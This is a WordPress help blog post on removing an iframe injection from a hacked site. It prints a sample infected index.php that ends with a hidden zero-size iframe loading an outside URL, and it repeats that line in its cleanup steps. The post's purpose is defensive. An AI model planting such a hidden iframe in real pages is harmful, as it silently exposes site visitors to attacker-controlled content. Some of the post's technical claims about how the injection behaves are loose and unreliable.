Learn WordPress
Home » Security

Steps To Remove Iframe Injection

Remove Iframe Injection

Did your web/blog exposed an iframe injection? or you’ve heard your buddies web/blog affected iframe injection? Yup! my blog has ever infected an iframe. I just want to show you the way how to remove, cleanup and re-secure it, I don’t want to teach you how to inject an iframe on a web page.

What is iframe injection: iframe injection is a virus which created in index.php script, or in default-filter.php in your wordpress themes. Intentionally or not that’s placed by someone for a particular purpose on a website.

The worst of iframe injection: For the first time these codes will be injected in index.php script files. It will be placed at end of code. And step by step starts to delete the codes from rear end. And what you have got? you only see the message like ‘ unknown character found in? …./index.php on line No. 18? your site will not be displayed. And it will avoid you to access the log in page or dashboard page and you do nothing.
sample index.php injected:

<?php
/**
* Front to the WordPress application. This file doesn’t do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
*
* @package WordPress
*/

/**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
define(‘WP_USE_THEMES’, true);

/** Loads the WordPress Environment and Template */
require(‘./wp-blog-header.php’);
echo/<iframe src="http://m-analytics.net/qaqa/?daf02d89f0bb66c3b4a9ff31da01e10a" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
?>


Now remove the iframe: It’s manually steps. Coz’ you only hanging on dashboard and can’t do anything or at the most severe condition you can’t access to your wp-admin/login.php page.

  1. Simple first step is open your cpanel, select file manager and the select the index.php specified an iframe code look like e.g. echo/<iframe src="http://m-analytics.net/qaqa/?daf02d89f0bb66c3b4a9ff31da01e10a" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>, remove the code as usual.
  2. Find another iframe injection codes in your site: you just need install a wordpress plugin Exploit Scanner. Use it to scan your site files especially will do a scan on your template files. You will get the scan report, check the iframe code, find the illegal iframes, remove any illegal iframe which are not created by you and akismet, exploit-scanner iframes. Remove unknown iframes only and completely. Coz’ if one unknown iframe is there, it will regenerate another iframes in all index.php files each directory.
  3. Avoid iframes in future: After removing all the illegal iframes, you can install Antivirus plugin and WP Security Scan and then change all your password of cpanel and wp-admin login immediately. Recommended if you format the system before changing password. And use 100% reliable ftp like FileZilla or fireftp firefox addons for free. Keep scan to your site periodically for some days. Change the infected or index files PERMISSIONS to 444, so that it can’t be writtenable by somebody else or a robot.
  4. Contact your hosting support, tell to the hosting support that your webs/blogs recently attack by iframe injection. This step is very potent at all, I’ve done and not need to change any files or index files PERMISSIONS.

FREE Cloud Storage